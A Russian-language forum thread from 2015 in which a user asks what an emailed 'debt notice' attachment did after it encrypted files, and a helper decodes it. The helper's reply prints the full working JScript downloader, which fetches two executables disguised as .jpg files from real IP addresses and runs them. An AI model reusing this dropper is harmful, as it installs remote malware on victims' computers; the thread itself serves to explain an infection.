Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 31.08.2015, 16:46
Новичок на форуме
Отправить личное сообщение для aratkevich Посмотреть профиль Найти все сообщения от aratkevich
 
Регистрация: 31.08.2015
Сообщений: 3

Подскажите, что делает (как работает) данный скрипт.
Добрый день! В JS ничего не понимаю, на почту пришло письмо с вложением и знакомая его запустила. И файлы Word и Excel зашифровались... Можно ли как-то их расшифровать... Файл пришедший по почте вложил.
Вложения:
Тип файла: txt Уведомление о задолженности.txt (13.2 Кб, 11 просмотров)
Ответить с цитированием
  #2 (permalink)  
Старый 31.08.2015, 17:23
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Текст закодированный в base64 преобразует в исходный код, например, var s = Base64.decode(b) - в итоге s будет равно вот такому червяку:

var email = "mail@allweld.ru";
function dl(fr,url,ext) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+ext;
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() { 
    if (xo.readyState == 4 && xo.status == 200) { 
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        if (xa.size > 0) {
            dn = 1; xa.position = 0;
            xa.saveToFile(fn,2);
            try {
                ws.Run(fn,1,1);
            }catch (er) {};
        };
        xa.close();
    };
};

try {
    xo.open("GET",url, false); xo.send(); 
} 
catch (er) {};  
};

dl('mail@allweld.ru','http://185.49.68.140/August.jpg','.exe');
dl('mail@allweld.ru','http://185.49.68.141/All.jpg','.exe');


и далее. Открывает HTA приложение, из под которого вся эта "кака" и работает.
Ответить с цитированием
  #3 (permalink)  
Старый 31.08.2015, 17:29
Новичок на форуме
Отправить личное сообщение для aratkevich Посмотреть профиль Найти все сообщения от aratkevich
 
Регистрация: 31.08.2015
Сообщений: 3

А расшифровать файлы зашифрованные этим скриптом можно???
Ответить с цитированием
  #4 (permalink)  
Старый 31.08.2015, 17:33
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Расшифровка не главное, код выше заливает на ваш комп червей с двух адресов под видом невинных картинок. 99% из 100, что ваш комп заражен, ну или подруги, в общем тот на котором это запускалось.
Кашмарский в помощь, искать на его страницах по описанию пакости, узнаете чем заражен и как лечить. Если конечно этот червяк им уже знаком.

Последний раз редактировалось laimas, 31.08.2015 в 17:40.
Ответить с цитированием
  #5 (permalink)  
Старый 31.08.2015, 21:09
Новичок на форуме
Отправить личное сообщение для aratkevich Посмотреть профиль Найти все сообщения от aratkevich
 
Регистрация: 31.08.2015
Сообщений: 3

Ясно. Спасибо!
Ответить с цитированием
  #6 (permalink)  
Старый 31.08.2015, 22:20
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Если интересно, то любопытную информацию можно получить о этих IP на whois сервисе, трассировка и пинг адресов.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите как изменить скрипт календаря natalya84i Элементы интерфейса 2 02.12.2012 21:08
подскажите как работает setTimeout ruslan368560 Общие вопросы Javascript 1 17.05.2011 18:48
Что делает этот скрипт? Wallkost Оффтопик 4 19.03.2010 14:54
что делает этот скрипт?)) jek Общие вопросы Javascript 5 10.01.2010 17:24
Подскажите как селать в отдельном файле ява скрипт с вызовом со страницы... alexmetalin Ваши сайты и скрипты 6 22.10.2009 15:21